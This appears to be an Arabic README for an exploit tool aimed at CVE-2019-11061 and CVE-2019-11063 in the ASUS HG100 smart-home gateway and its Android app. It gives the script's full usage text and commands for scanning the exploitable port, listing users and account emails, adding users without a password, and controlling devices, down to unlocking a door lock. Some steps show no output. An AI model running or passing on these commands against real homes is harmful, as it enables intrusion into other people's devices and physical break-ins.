
استغلال ASUS SmartHome لـ CVE-2019-11061 و CVE-2019-11063
CVE-2019-11061 : ثغرة في التحكم بالوصول في HG100
المنتجات المتأثرة: بوابة ASUS المنزلية الذكية HG100 إصدار البرنامج الثابت < 4.00.09
CVE-2019-11063 : ثغرة في التحكم بالوصول في تطبيق المنزل الذكي
المنتجات المتأثرة: تطبيق ASUS المنزلي الذكي لأندرويد الإصدار < 3.0.45_190701
إذا كان المهاجم على نفس الشبكة الداخلية لجهاز HG100 أو جهاز محمول مع التطبيق المصاحب (أندرويد أو آيفون). يمكن للمهاجم إرسال طلبات تحكم إليها.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
افحص المنفذ القابل للاستغلال بجهاز محمول (مثبت عليه التطبيق المصاحب لأندرويد أو آيفون):
ملاحظة: خيار -v سيعرض المستخدمين الذين تمت إضافتهم إلى HG100.
أو
افحص منفذ HG100 القابل للاستغلال:
احصل على جميع المستخدمين المضافين إلى HG100:

أو أضف مستخدمًا جديدًا:
ملاحظة: استخدم https://10.42.50.166:8083 لوسيطة "cmd".
على سبيل المثال:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
احصل على معلومات جميع الأجهزة تحت بوابة المنزل الذكي:
ملاحظة: إذا لم يتم تعيين خيار --user، فسيتم تحديد أول مستخدم في HG100 تلقائيًا. (لأنه لا حاجة لكلمة مرور)
المقارنة مع التطبيق:
تحكم (افتح) قفل الباب.
ملاحظة: القيمة 1028 تم الحصول عليها من خيار -l (الخطوة 3).
النتيجة:
